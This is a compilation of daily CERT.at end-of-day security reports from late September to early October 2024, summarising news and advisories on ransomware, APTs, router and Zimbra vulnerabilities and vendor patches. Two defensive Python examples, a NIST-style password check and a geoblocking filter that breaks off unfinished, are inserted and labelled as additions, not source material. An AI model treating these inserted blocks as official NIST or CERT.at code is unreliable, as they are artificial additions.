In 2024, routers are a primary target for cybercriminals and state-sponsored attackers – and are the riskiest device category on networks. With this knowledge, we investigated one vendor with a history of security flaws to help it address its issues and prevent new attacks. Our latest research discovered 14 new vulnerabilities in DrayTek routers.
---------------------------------------------
https://www.forescout.com/resources/draybreak-draytek-research/
∗∗∗ Threat actor believed to be spreading new MedusaLocker variant since 2022 ∗∗∗
---------------------------------------------
Talos has recently observed an attack leading to the deployment of a MedusaLocker ransomware variant known as “BabyLockerKZ.” The distinguishable techniques — including consistently storing the same set of tools in the same location on compromised systems, the use of tools that have the PDB path with the string “paid_memes,” and the use of a lateral movement tool named “checker” — used in the attack led us to take a deeper look to try to understand more about this threat actor.
---------------------------------------------
https://blog.talosintelligence.com/threat-actor-believed-to-be-spreading-ne…
∗∗∗ Ransomware Groups Demystified: CyberVolk Ransomware ∗∗∗
---------------------------------------------
As part of our ongoing efforts to monitor emerging cyber threats, we have analyzed the activities of CyberVolk, a politically motivated hacktivist group that transitioned into using ransomware and has been active since June 2024.
---------------------------------------------
https://www.rapid7.com/blog/post/2024/10/03/ransomware-groups-demystified-c…
∗∗∗ Google Adds New Pixel Security Features to Block 2G Exploits and Baseband Attacks ∗∗∗
---------------------------------------------
Google has revealed the various security guardrails that have been incorporated into its latest Pixel devices to counter the rising threat posed by baseband security attacks.
---------------------------------------------
https://thehackernews.com/2024/10/android-14-adds-new-security-features.html
∗∗∗ Portable Hacking Lab: Control The Smallest Kali Linux With a Smartphone ∗∗∗
---------------------------------------------
Running Kali Linux on a Raspberry Pi Zero is a fantastic way to create a portable, powerful testing device. This guide will walk you through setting up Kali Linux Pi-Tail on a headless Raspberry Pi Zero 2 W that is powered and controlled from a smartphone via SSH or VNC that provides a graphical interface to your Pi-Tail.
---------------------------------------------
https://www.mobile-hacker.com/2024/10/04/portable-hacking-lab-control-the-s…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (firefox, golang, linux-firmware, and thunderbird), Debian (kernel and zabbix), Fedora (firefox, pgadmin4, and php), Mageia (chromium-browser-stable, cjson, hostapd and wpa_supplicant, and openjpeg2), Oracle (firefox, flatpak, and go-toolset:ol8), Red Hat (cups-filters, firefox, grafana, linux-firmware, python3, python3.11, and python3.9), SUSE (expat, firefox, libpcap, and opensc), and Ubuntu (freeradius, imagemagick, and unzip).
---------------------------------------------
https://lwn.net/Articles/992936/
∗∗∗ Keycloak 26.0.0 released ∗∗∗
---------------------------------------------
CVE-2024-7318 - Use of a Key Past its Expiration Date in org.keycloak:keycloak-core, CVE-2024-8883 - Vulnerable Redirect URI Validation Results in Open Redirect, CVE-2024-8698 - Improper Verification of SAML Responses Leading to Privilege Escalation in Keycloak, CVE-2024-7254 - Stack-based Buffer Overflow in com.google.protobuf:protobuf-java
---------------------------------------------
https://www.keycloak.org/2024/10/keycloak-2600-released
∗∗∗ Wordfence Intelligence Weekly WordPress Vulnerability Report (September 23, 2024 to September 29, 2024) ∗∗∗
---------------------------------------------
https://www.wordfence.com/blog/2024/10/wordfence-intelligence-weekly-wordpr…
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 02-10-2024 18:00 − Thursday 03-10-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Fake browser updates spread updated WarmCookie malware ∗∗∗
---------------------------------------------
A new FakeUpdate campaign targeting users in France leverages compromised websites to show fake browser and application updates that spread a new version of the WarmCookie malware.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/fake-browser-updates-spread-…
∗∗∗ FIN7 hackers launch deepfake nude “generator” sites to spread malware ∗∗∗
---------------------------------------------
The notorious APT hacking group known as FIN7 launched a network of fake AI-powered deepnude generator sites to infect visitors with information-stealing malware.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/fin7-hackers-launch-deepfake…
∗∗∗ Weird Zimbra Vulnerability ∗∗∗
---------------------------------------------
Hackers can execute commands on a remote computer by sending malformed emails to a Zimbra mail server. It's critical, but difficult to exploit. In an email sent Wednesday afternoon, Proofpoint researcher Greg Lesnewich seemed to largely concur that the attacks weren't likely to lead to mass infections that could install ransomware or espionage ..
---------------------------------------------
https://www.schneier.com/blog/archives/2024/10/weird-zimbra-vulnerability.h…
∗∗∗ INTERPOL Arrests 8 in Major Phishing and Romance Fraud Crackdown in West Africa ∗∗∗
---------------------------------------------
INTERPOL has announced the arrest of eight individuals in Côte d'Ivoire and Nigeria as part of a crackdown on phishing scams and romance cyber fraud. Dubbed Operation Contender 2.0, the initiative is designed to tackle cyber-enabled crimes ..
---------------------------------------------
https://thehackernews.com/2024/10/interpol-arrests-8-in-major-phishing.html
∗∗∗ APT and financial attacks on industrial organizations in Q2 2024 ∗∗∗
---------------------------------------------
This summary provides an overview of the reports of APT and financial attacks on industrial enterprises that were disclosed in Q2 2024, as well as the related activities of groups that have been observed attacking industrial organizations and critical infrastructure facilities.
---------------------------------------------
https://ics-cert.kaspersky.com/publications/apt-and-financial-attacks-on-in…
∗∗∗ Experts warn of DDoS attacks using linux printing vulnerability ∗∗∗
---------------------------------------------
A set of bugs that has caused alarm among cybersecurity experts may enable threat actors to launch powerful attacks designed to knock systems offline.
---------------------------------------------
https://therecord.media/ddos-attacks-cups-linux-print-vulnerability
∗∗∗ As ransomware attacks surge, UK privacy regulator investigating fewer incidents than ever ∗∗∗
---------------------------------------------
Of the 1,253 incidents reported to the Information Commissioner’s Office (ICO) in 2023, only 87 were investigated — fewer than 7%. The numbers so far for 2024 are similar.
---------------------------------------------
https://therecord.media/uk-ico-ransomware-investigations-data
∗∗∗ Threat actor believed to be spreading new MedusaLocker variant since 2022 ∗∗∗
---------------------------------------------
Cisco Talos has discovered a financially motivated threat actor, active since 2022, recently observed delivering a MedusaLocker ransomware variant. Intelligence collected by Talos on tools regularly employed by the threat ..
---------------------------------------------
https://blog.talosintelligence.com/threat-actor-believed-to-be-spreading-ne…
∗∗∗ perfctl: A Stealthy Malware Targeting Millions of Linux Servers ∗∗∗
---------------------------------------------
In this blog post, Aqua Nautilus researchers aim to shed light on a Linux malware that, over the past 3-4 years, has actively sought more than 20,000 types of misconfigurations in order to target and exploit Linux servers. If you ..
---------------------------------------------
https://blog.aquasec.com/perfctl-a-stealthy-malware-targeting-millions-of-l…
∗∗∗ "Alptraum": Daten aller niederländischen Polizisten geklaut – von Drittstaat? ∗∗∗
---------------------------------------------
Hackers have captured the contact details of all police employees. Now the Ministry of Justice has come out with another alarming piece of news.
---------------------------------------------
https://heise.de/-9961529
∗∗∗ Thai government attacked by new APT "CeranaKeeper" ∗∗∗
---------------------------------------------
In attacks on Thai government agencies, cybercriminals exfiltrated data by uploading encrypted files to file-sharing services.
---------------------------------------------
https://heise.de/-9961562
=====================
= Vulnerabilities =
=====================
∗∗∗ ZDI-24-1321: Apple macOS AppleVADriver Out-Of-Bounds Write Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-40841.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1321/
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (cups-filters), Debian (chromium and php8.2), Fedora (firefox), Oracle (cups-filters, flatpak, kernel, krb5, oVirt 4.5 ovirt-engine, and python-urllib3), Red Hat (cups-filters, firefox, go-toolset:rhel8, golang, and thunderbird), SUSE (postgresql16), and Ubuntu (gnome-shell and linux-azure-fde-5.15).
---------------------------------------------
https://lwn.net/Articles/992798/
∗∗∗ Two-factor Authentication (TFA) - Critical - Access bypass - SA-CONTRIB-2024-043 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-043
∗∗∗ Cisco Nexus Dashboard Fabric Controller Arbitrary Command Execution Vulnerability ∗∗∗
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Cisco Meraki MX and Z Series Teleworker Gateway AnyConnect VPN Denial of Service Vulnerabilities ∗∗∗
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 01-10-2024 18:00 − Wednesday 02-10-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Crook made millions by breaking into execs’ Office365 inboxes, feds say ∗∗∗
---------------------------------------------
Email accounts inside 5 US companies unlawfully breached through password resets.
---------------------------------------------
https://arstechnica.com/?p=2053721
∗∗∗ Evil Corp hit with new sanctions, BitPaymer ransomware charges ∗∗∗
---------------------------------------------
The Evil Corp cybercrime syndicate has been hit with new sanctions by the United States, United Kingdom, and Australia. The US also indicted one of its members for conducting BitPaymer ransomware attacks.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/evil-corp-hit-with-new-sanct…
∗∗∗ Arc browser launches bug bounty program after fixing RCE bug ∗∗∗
---------------------------------------------
The Browser Company has introduced an Arc Bug Bounty Program to encourage security researchers to report vulnerabilities to the project and receive rewards.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/arc-browser-launches-bug-bou…
∗∗∗ CISA: Network switch RCE flaw impacts critical infrastructure ∗∗∗
---------------------------------------------
U.S. cybersecurity agency CISA is warning about two critical vulnerabilities that allow authentication bypass and remote code execution in Optigo Networks ONS-S8 Aggregation Switch products used in critical infrastructure.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/cisa-network-switch-rce-flaw…
∗∗∗ PyPI Repository Found Hosting Fake Crypto Wallet Recovery Tools That Steal User Data ∗∗∗
---------------------------------------------
A new set of malicious packages has been unearthed in the Python Package Index (PyPI) repository that masqueraded as cryptocurrency wallet recovery and management services, only to siphon sensitive data and facilitate the theft ..
---------------------------------------------
https://thehackernews.com/2024/10/pypi-repository-found-hosting-fake.html
∗∗∗ Alert: Over 700,000 DrayTek Routers Exposed to Hacking via 14 New Vulnerabilities ∗∗∗
---------------------------------------------
A little over a dozen new security vulnerabilities have been discovered in residential and enterprise routers manufactured by DrayTek that could be exploited to take over susceptible devices. "These vulnerabilities could enable attackers to take control ..
---------------------------------------------
https://thehackernews.com/2024/10/alert-over-700000-draytek-routers.html
∗∗∗ NIST's security flaw database still backlogged with 17K+ unprocessed bugs. Not great ∗∗∗
---------------------------------------------
Logjam hurting infosec processes the world over, one expert tells us, as US body blows its own Sept deadline. NIST has made some progress clearing its backlog of security vulnerability reports to process - though it's not quite on target as hoped.
---------------------------------------------
https://www.theregister.com/2024/10/02/cve_pileup_nvd_missed_deadline/
∗∗∗ After Code Execution, Researchers Show How CUPS Can Be Abused for DDoS Attacks ∗∗∗
---------------------------------------------
Over 58,000 internet-exposed CUPS hosts can be abused for significant DDoS attacks, according to Akamai.
---------------------------------------------
https://www.securityweek.com/after-code-execution-researchers-show-how-cups…
∗∗∗ Dotnet Source Generators in 2024 Part 1: Getting Started ∗∗∗
---------------------------------------------
In this blog post, we will cover the basics of a source generator, the major types involved, some common issues you might encounter, how to properly log those issues, and how to fix them.
---------------------------------------------
https://posts.specterops.io/dotnet-source-generators-in-2024-part-1-getting…
∗∗∗ Active exploitation of a vulnerability in Zimbra Mail Server (CVE-2024-45519) ∗∗∗
---------------------------------------------
Synacor, the vendor of the Zimbra mail server, has published an advisory on a vulnerability in Zimbra Collaboration. The published vulnerability, CVE-2024-45519, allows unauthenticated users to execute code remotely. Updates are available for each of the affected versions (9.0.0, 10.0.9, 10.1.1 and 8.8.15), which ..
---------------------------------------------
https://www.cert.at/de/aktuelles/2024/10/zimbra-rce-cve-2024-45519
∗∗∗ Security: data leaks after cyberattacks ∗∗∗
---------------------------------------------
After a cyberattack on a clinic in Bad Wildungen in August 2024, data has now surfaced on the darknet. The Dutch police also suffered a data leak after a cyberattack. Here is some information ..
---------------------------------------------
https://www.borncity.com/blog/2024/10/02/sicherheit-datenabfluesse-bei-cybe…
∗∗∗ All that JavaScript for… spear phishing? ∗∗∗
---------------------------------------------
NVISO employs several hunting rules in multiple Threat Intelligence Platforms and other sources, such as VirusTotal. As you can imagine, there is no lack of APT (Advanced Persistent Threat) campaigns, cybercriminals and their associated malware families and campaigns, phishing, and so on. But now and then, something slightly different and perhaps novel ..
---------------------------------------------
https://blog.nviso.eu/2024/10/02/all-that-javascript-for-spear-phishing/
∗∗∗ ASD’s ACSC, CISA, FBI, NSA, and International Partners Release Guidance on Principles of OT Cybersecurity for Critical Infrastructure Organizations ∗∗∗
---------------------------------------------
Today, the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) - in partnership with CISA, U.S. government and international partners - released the guide Principles of Operational Technology Cybersecurity. This guidance provides critical information on how to create and maintain a safe, secure operational ..
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/10/01/asds-acsc-cisa-fbi-nsa-a…
∗∗∗ LKA Niedersachsen warns of ongoing extortion e-mail scam ∗∗∗
---------------------------------------------
The fraudsters are not letting up, warns the LKA Niedersachsen. Extortion e-mails, for instance with alleged video recordings, continue to circulate.
---------------------------------------------
https://heise.de/-9960503
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (grafana), Fedora (cjson and php), Oracle (389-ds-base, freeradius, grafana, kernel, and krb5), Slackware (cryfs, cups, and mozilla), SUSE (OpenIPMI, openssl-3, openvpn, thunderbird, and tomcat), and Ubuntu (cups, cups-filters, knot-resolver, linux-raspi, linux-raspi-5.4, orc, php7.4, php8.1, php8.3, python-asyncssh, ruby-devise-two-factor, and vim).
---------------------------------------------
https://lwn.net/Articles/992650/
=====================
= End-of-Day report =
=====================
Timeframe: Monday 30-09-2024 18:00 − Tuesday 01-10-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Microsoft Defender adds detection of unsecure Wi-Fi networks ∗∗∗
---------------------------------------------
Microsoft Defender now automatically detects and notifies users with a Microsoft 365 Personal or Family subscription when they're connected to unsecured Wi-Fi networks.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/microsoft-defender-now-autom…
∗∗∗ Microsoft overhauls security for publishing Edge extensions ∗∗∗
---------------------------------------------
Microsoft has introduced an updated version of the "Publish API for Edge extension developers" that increases the security for developer accounts and the updating of browser extensions.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/microsoft-overhauls-securit…
∗∗∗ What Are Hackers Searching for in SolarWinds Serv-U (CVE-2024-28995)? ∗∗∗
---------------------------------------------
Discover how GreyNoise’s honeypots are monitoring exploit attempts on the SolarWinds Serv-U vulnerability (CVE-2024-28995). Gain insights into the specific files attackers target and how real-time data helps security teams focus on true threats.
---------------------------------------------
https://www.greynoise.io/blog/what-are-hackers-searching-for-in-solarwinds-…
∗∗∗ Detecting Vulnerability Scanning Traffic From Underground Tools Using Machine Learning ∗∗∗
---------------------------------------------
Researchers detail the discovery of Swiss Army Suite, an underground tool used for SQL injection scans discovered with a machine learning model.
---------------------------------------------
https://unit42.paloaltonetworks.com/machine-learning-new-swiss-army-suite-t…
∗∗∗ Rackspace internal monitoring web servers hit by zero-day ∗∗∗
---------------------------------------------
Reading between the lines, it appears Rackspace was hosting a ScienceLogic-powered monitoring dashboard for its customers on its own internal web servers, those servers included a program that was bundled with ScienceLogic's software, and that program was exploited, using a zero-day vulnerability, by miscreants to gain access to those web servers. From there, the intruders were able to get hold of some monitoring-related customer information before being caught.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2024/09/30/rackspace_ze…
∗∗∗ Crooked Cops, Stolen Laptops & the Ghost of UGNazi ∗∗∗
---------------------------------------------
A California man accused of failing to pay taxes on tens of millions of dollars allegedly earned from cybercrime also paid local police officers hundreds of thousands of dollars to help him extort, intimidate and silence rivals and former business partners, a new indictment charges. KrebsOnSecurity has learned that many of the man's alleged targets were members of UGNazi, a hacker group behind multiple high-profile breaches and cyberattacks back in 2012.
---------------------------------------------
https://krebsonsecurity.com/2024/09/crooked-cops-stolen-laptops-the-ghost-o…
∗∗∗ BSI recommends the use of passkeys ∗∗∗
---------------------------------------------
The BSI recommends the use of passkeys. A survey reportedly shows that awareness and adoption still have room for improvement.
---------------------------------------------
https://heise.de/-9959270
∗∗∗ Ransomware: investigators report new successes in the fight against LockBit ∗∗∗
---------------------------------------------
Besides arrests in France and the United Kingdom, international law enforcement agencies have disrupted the extortionists' infrastructure; sanctions were also imposed.
---------------------------------------------
https://heise.de/-9959100
∗∗∗ WordPress Vulnerability & Patch Roundup September 2024 ∗∗∗
---------------------------------------------
Vulnerability reports and responsible disclosures are essential for website security awareness and education.
---------------------------------------------
https://blog.sucuri.net/2024/09/wordpress-vulnerability-patch-roundup-septe…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (debian-security-support, nghttp2, and sqlite3), Oracle (cups-filters, kernel, and osbuild-composer), SUSE (openssl-3), and Ubuntu (bubblewrap, flatpak and python2.7, python3.5).
---------------------------------------------
https://lwn.net/Articles/992444/
∗∗∗ Mozilla Foundation Security Advisories 2024-10-01 (Thunderbird and Firefox) ∗∗∗
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/
∗∗∗ Juniper: 2024-09-30 Out of Cycle Security Advisory: Multiple Products: RADIUS protocol susceptible to forgery attacks (Blast-RADIUS) (CVE-2024-3596) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-09-30-Out-of-Cycle-Securit…
∗∗∗ Bosch: Sensitive information disclosure in Bosch Configuration Manager ∗∗∗
---------------------------------------------
https://psirt.bosch.com/security-advisories/bosch-sa-981803-bt.html
=====================
= End-of-Day report =
=====================
Timeframe: Friday 27-09-2024 18:00 − Monday 30-09-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ US election campaign: charges filed over the hack of the Trump campaign ∗∗∗
---------------------------------------------
Three men must stand trial for the cyberattack on Donald Trump's campaign team.
---------------------------------------------
https://www.golem.de/news/us-wahlkampf-anklage-wegen-des-hacks-der-trump-ka…
∗∗∗ How to Know if Your Website Is Hacked ∗∗∗
---------------------------------------------
Whether you manage a gaming blog, an e-commerce platform, or an enterprise-level website you probably want to be able to detect infections when they occur. A hacked website can lead to financial loss, disruption of business operations, and the exposure of confidential information. The key is acting fast once you discover possible ..
---------------------------------------------
https://blog.sucuri.net/2024/09/how-do-website-owners-know-that-their-websi…
∗∗∗ If you're holding important data, Iran is probably trying to spearphish it ∗∗∗
---------------------------------------------
It's election year for more than 50 countries and the Islamic Republic threatens a bunch of them. US and UK national security agencies are jointly warning about Iranian spearphishing campaigns, which remain an ongoing threat to various industries and governments.
---------------------------------------------
https://www.theregister.com/2024/09/30/iran_spearphishing/
∗∗∗ The Pig Butchering Invasion Has Begun ∗∗∗
---------------------------------------------
Scamming operations that once originated in Southeast Asia are now proliferating around the world, likely raking in billions of dollars in the process.
---------------------------------------------
https://www.wired.com/story/pig-butchering-scam-invasion/
∗∗∗ Eliminating Memory Safety Vulnerabilities at the Source ∗∗∗
---------------------------------------------
Memory safety vulnerabilities remain a pervasive threat to software security. At Google, we believe the path to eliminating this class of vulnerabilities at scale and building high-assurance software lies in Safe Coding, a secure-by-design approach that prioritizes transitioning ..
---------------------------------------------
http://security.googleblog.com/2024/09/eliminating-memory-safety-vulnerabil…
∗∗∗ The Data Breach Disclosure Conundrum ∗∗∗
---------------------------------------------
The conundrum I refer to in the title of this post is the one faced by a breached organisation: disclose or suppress? And let me be even more specific: should they disclose to impacted individuals, or simply never let them know?
---------------------------------------------
https://www.troyhunt.com/the-data-breach-disclosure-conundrum/
∗∗∗ How can you protect your data, privacy, and finances if your phone gets lost or stolen? ∗∗∗
---------------------------------------------
Steps to take when your device is lost or stolen TL;DR This is a guide to help prepare for a situation where your mobile device is lost or stolen, including ..
---------------------------------------------
https://www.pentestpartners.com/security-blog/how-can-you-protect-your-data…
∗∗∗ Cyber Security Month: strengthen your knowledge ∗∗∗
---------------------------------------------
In October everything revolves around cybersecurity. Use the opportunity to refresh your knowledge of phishing, malware and other cyber threats.
---------------------------------------------
https://www.watchlist-internet.at/news/cyber-security-month-2024/
∗∗∗ Nitrogen Campaign Drops Sliver and Ends With BlackCat Ransomware ∗∗∗
---------------------------------------------
In November 2023, we identified a BlackCat ransomware intrusion started by Nitrogen malware hosted on a website impersonating Advanced IP ..
---------------------------------------------
https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-end…
∗∗∗ Data protection incident at GlobalSign (Sept. 2024) ∗∗∗
---------------------------------------------
The provider GlobalSign had to admit a data protection incident to some of its customers. A misconfiguration in its customer relationship management (CRM) platform meant that a ..
---------------------------------------------
https://www.borncity.com/blog/2024/09/30/datenschutzvorfall-bei-globalsign-…
∗∗∗ Facial DNA provider leaks biometric data via WordPress folder ∗∗∗
---------------------------------------------
ChiceDNA exposed 8,000 sensitive records, including biometric images, personal details, and facial DNA data in an unsecured WordPress…
---------------------------------------------
https://hackread.com/facial-dna-provider-leak-biometric-data-wordpress-fold…
=====================
= Vulnerabilities =
=====================
∗∗∗ Local privilege escalation via MSI installer in Nitro PDF Pro ∗∗∗
---------------------------------------------
https://sec-consult.com/de/vulnerability-lab/advisory/local-privilege-escal…
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 26-09-2024 18:00 − Friday 27-09-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Storm-0501: Ransomware attacks expanding to hybrid cloud environments ∗∗∗
---------------------------------------------
Microsoft has observed the threat actor tracked as Storm-0501 launching a multi-staged attack where they compromised hybrid cloud environments and performed lateral movement from on-premises to cloud environment, leading to data exfiltration, credential theft, tampering, persistent backdoor access, and ransomware deployment. The ..
---------------------------------------------
https://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomw…
∗∗∗ NIST Recommends Some Common-Sense Password Rules ∗∗∗
---------------------------------------------
NIST's second draft of its "SP 800-63-4" - its digital identity guidelines - finally contains some really good rules about passwords.
---------------------------------------------
https://www.schneier.com/blog/archives/2024/09/nist-recommends-some-common-…
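As an added illustration (not code from NIST or from the linked post), here is what a verifier-side password check looks like once the SP 800-63B rules the post praises are applied: a minimum length rather than composition rules, acceptance of long passphrases with spaces and Unicode, Unicode normalization before comparison, and a blocklist of breached, common and context-specific values. The blocklist contents, the usernames and the 8/15 character thresholds as encoded here are this example's reading of the draft, not a quotation of it.

```python
"""Added example: NIST SP 800-63B style password acceptance check.

Rules encoded (assumptions of this example, check them against the draft):
  - minimum 8 characters; 15 when the caller asks for the draft's recommended minimum
  - accept at least 64 characters (no upper bound is enforced here)
  - any printable character is allowed, including spaces and non-ASCII
  - no composition rules (no "one digit, one symbol" requirements)
  - reject passwords on a blocklist and passwords containing the username
"""
import unicodedata

MIN_LEN = 8
RECOMMENDED_MIN_LEN = 15

# Constructed blocklist standing in for a real breached-password corpus.
BLOCKLIST = {"password", "123456789", "qwerty123", "letmein!"}


def normalize(pw: str) -> str:
    # Normalize before comparing/hashing so the same visible string always
    # maps to the same bytes regardless of the client's Unicode form.
    return unicodedata.normalize("NFKC", pw)


def check_password(pw: str, *, username: str = "", recommended: bool = False,
                   blocklist=BLOCKLIST) -> list:
    """Return the reasons the password is rejected; an empty list means accepted."""
    reasons = []
    pw = normalize(pw)
    length = len(pw)  # count characters, not bytes, so Unicode is not penalized
    min_len = RECOMMENDED_MIN_LEN if recommended else MIN_LEN
    if length < min_len:
        reasons.append(f"shorter than {min_len} characters")
    if pw.lower() in blocklist:
        reasons.append("found in blocklist")
    if username and username.lower() in pw.lower():
        reasons.append("contains the username")
    # Deliberately nothing else: no character-class rules, no hints, no forced rotation.
    return reasons


if __name__ == "__main__":
    for candidate in ["correct horse battery staple", "password", "Tr0ub4dor&3"]:
        print(repr(candidate), "->", check_password(candidate) or "accepted")
```

The check returns reasons rather than a boolean so the UI can tell the user exactly why a value was refused, which the draft asks for; note that the blocklist comparison is done on the normalized, lower-cased value, so a real deployment should store its blocklist in the same form.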
∗∗∗ Kaspersky Defends Stealth Swap of Antivirus Software on US Computers ∗∗∗
---------------------------------------------
Cybersecurity firm Kaspersky has defended its decision to automatically replace its antivirus software on U.S. customers' computers with UltraAV, a product from American company Pango, without explicit user consent. The forced switch, affecting nearly one million users, occurred as a result of a U.S. government ban on Kaspersky software. Kaspersky ..
---------------------------------------------
https://it.slashdot.org/story/24/09/26/1825249/kaspersky-defends-stealth-sw…
∗∗∗ Hackers Could Have Remotely Controlled Kia Cars Using Only License Plates ∗∗∗
---------------------------------------------
Cybersecurity researchers have disclosed a set of now patched vulnerabilities in Kia vehicles that, if successfully exploited, could have allowed remote control over key functions simply by using only a license plate."These attacks could be ..
---------------------------------------------
https://thehackernews.com/2024/09/hackers-could-have-remotely-controlled.ht…
∗∗∗ Victims lose $70K to one single wallet-draining app on Google's Play Store ∗∗∗
---------------------------------------------
Attackers got 10k people to download a trusted web3 brand cheat before Mountain View intervened. The latest in a long line of cryptocurrency wallet-draining attacks has stolen $70,000 from people who downloaded a dodgy app in a single campaign ..
---------------------------------------------
https://www.theregister.com/2024/09/26/victims_lose_70k_to_play/
∗∗∗ Patch now: Critical Nvidia bug allows container escape, complete host takeover ∗∗∗
---------------------------------------------
33% of cloud environments using the toolkit impacted, we're told. A critical bug in Nvidia's widely used Container Toolkit could allow a rogue user or software to escape their containers and ultimately take complete control of the underlying host.
---------------------------------------------
https://www.theregister.com/2024/09/26/critical_nvidia_bug_container_escape/
∗∗∗ Highly Anticipated Linux Flaw Allows Remote Code Execution, but Less Serious Than Expected ∗∗∗
---------------------------------------------
A researcher has disclosed the details of an unpatched vulnerability that was expected to pose a serious threat to many Linux systems.
---------------------------------------------
https://www.securityweek.com/highly-anticipated-linux-flaw-allows-remote-co…
∗∗∗ US Announces Charges, Sanctions Against Russian Administrator of Carding Website ∗∗∗
---------------------------------------------
US offers up to $10 million for information on Timur Shakhmametov, charging him with running the carding website Joker’s Stash.
---------------------------------------------
https://www.securityweek.com/us-announces-charges-sanctions-against-russian…
∗∗∗ Groundbreaking for the TU Graz cybersecurity campus ∗∗∗
---------------------------------------------
Around 25 million euros are being invested in the complex for up to 160 researchers in the Sandgasse. IT start-ups are also to find space there.
---------------------------------------------
https://www.derstandard.at/story/3000000238456/spatenstich-fuer-cybersecuri…
∗∗∗ Cyberespionage the Gamaredon way: Analysis of toolset used to spy on Ukraine in 2022 and 2023 ∗∗∗
---------------------------------------------
ESET Research has conducted a comprehensive technical analysis of Gamaredon’s toolset used to conduct its cyberespionage activities focused in Ukraine
---------------------------------------------
https://www.welivesecurity.com/en/eset-research/cyberespionage-gamaredon-wa…
∗∗∗ Geoblocking as a simple DDoS defence ∗∗∗
---------------------------------------------
Distributed denial of service (DDoS) attacks come in many variants, ranging from high-bandwidth reflected UDP, through tricks at layer 4 (such as TCP SYN flooding, or simply exhausting the state tables of firewalls), to layer 7 attacks with many expensive HTTP requests. We are currently seeing the latter, about which we want to ..
---------------------------------------------
https://www.cert.at/de/blog/2024/9/geoblocking-gegen-ddos
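For the layer-7 case the post describes, the decision a reverse proxy or WAF has to make per request is small: map the client address to a country with a longest-prefix lookup, allow a short list of countries, and never block prefixes you depend on (monitoring, partners). The following is an added example, not CERT.at's code or the setup from the post; the prefix table, country codes and trusted-proxy range are constructed for the demo, and in production the table would come from a GeoIP database or the RIR delegation files. It also shows the one mistake that makes geoblocking trivially bypassable: trusting X-Forwarded-For from an untrusted peer.

```python
"""Added example: per-request geoblock decision for a layer-7 DDoS filter.

Assumptions (constructed for this example): the prefix-to-country table,
the allowed-country set, the exempt prefixes and the trusted-proxy range.
"""
import ipaddress
from typing import Optional

# Constructed prefix table; a real one has hundreds of thousands of entries.
PREFIX_TABLE = [
    ("192.0.2.0/24", "AT"),
    ("198.51.100.0/24", "DE"),
    ("203.0.113.0/24", "XX"),   # "XX": some country outside the allowlist
    ("2001:db8:1::/48", "AT"),
    ("2001:db8::/32", "XX"),    # less specific than the /48 above
]
# Most specific prefix first, so the first containing network wins (longest-prefix match).
_NETS = sorted(((ipaddress.ip_network(p), cc) for p, cc in PREFIX_TABLE),
               key=lambda t: t[0].prefixlen, reverse=True)

ALLOWED_COUNTRIES = {"AT", "DE"}
# Never block these, whatever country they map to (monitoring, partners, own offices).
EXEMPT_PREFIXES = [ipaddress.ip_network("203.0.113.128/25")]
# Only these peers are allowed to tell us the "real" client address.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def country_of(ip: str) -> Optional[str]:
    """Longest-prefix lookup; None when the address is not in the table."""
    addr = ipaddress.ip_address(ip)
    for net, cc in _NETS:
        if addr.version == net.version and addr in net:
            return cc
    return None


def decide(ip: str, *, fail_open: bool = False) -> str:
    """Return 'allow' or 'block' for one client address."""
    addr = ipaddress.ip_address(ip)
    if any(addr in n for n in EXEMPT_PREFIXES if n.version == addr.version):
        return "allow"
    cc = country_of(ip)
    if cc is None:
        # Unknown origin: during an attack you usually want fail-closed,
        # outside of an attack fail-open avoids hurting unmapped legitimate users.
        return "allow" if fail_open else "block"
    return "allow" if cc in ALLOWED_COUNTRIES else "block"


def client_ip(remote_addr: str, xff: Optional[str], trusted=TRUSTED_PROXIES) -> str:
    """Use X-Forwarded-For only when the TCP peer is a proxy we control.

    Otherwise any attacker sets the header and picks a country for themselves.
    """
    peer = ipaddress.ip_address(remote_addr)
    if xff and any(peer in n for n in trusted if n.version == peer.version):
        return xff.split(",")[0].strip()  # leftmost entry = original client
    return remote_addr


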